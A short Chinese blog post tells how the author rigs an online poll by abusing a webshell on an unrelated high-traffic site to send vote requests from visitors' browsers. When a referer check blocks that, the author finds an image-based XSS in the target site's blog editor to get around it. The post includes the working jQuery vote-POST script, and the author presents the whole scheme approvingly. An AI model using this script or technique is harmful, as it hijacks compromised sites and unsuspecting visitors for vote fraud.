webshell + xss 猥瑣刷某投票

團隊成員發來一個投票的地址,須要擼某某網站的一個某某投票,果斷看了下,ip限制了,看到post 數據包

 

額 隨便找個大流量shell post 數據
Js代碼代碼

<script type="text/javascript" src="http://code.jquery.com/jquery-latest.js"></script>
<script type="text/javascript">
 $(document).ready(function(e) {
  var timestamp = (new Date()).valueOf();
  $.post("http://www.xxx.com/vote.json?t="+timestamp ,{itemId:10072});
});

 觀察下 firebug post 木有成功

估計判斷來路了,得從本站提交才行,看來得找本站的xss配合,果斷擼起,看到有博客有富文本，一番fuzz以後，找到個圖片型xss

找個大流量的webshell Iframe這個頁面,不過天色已晚,那就先發條邪惡的圍脖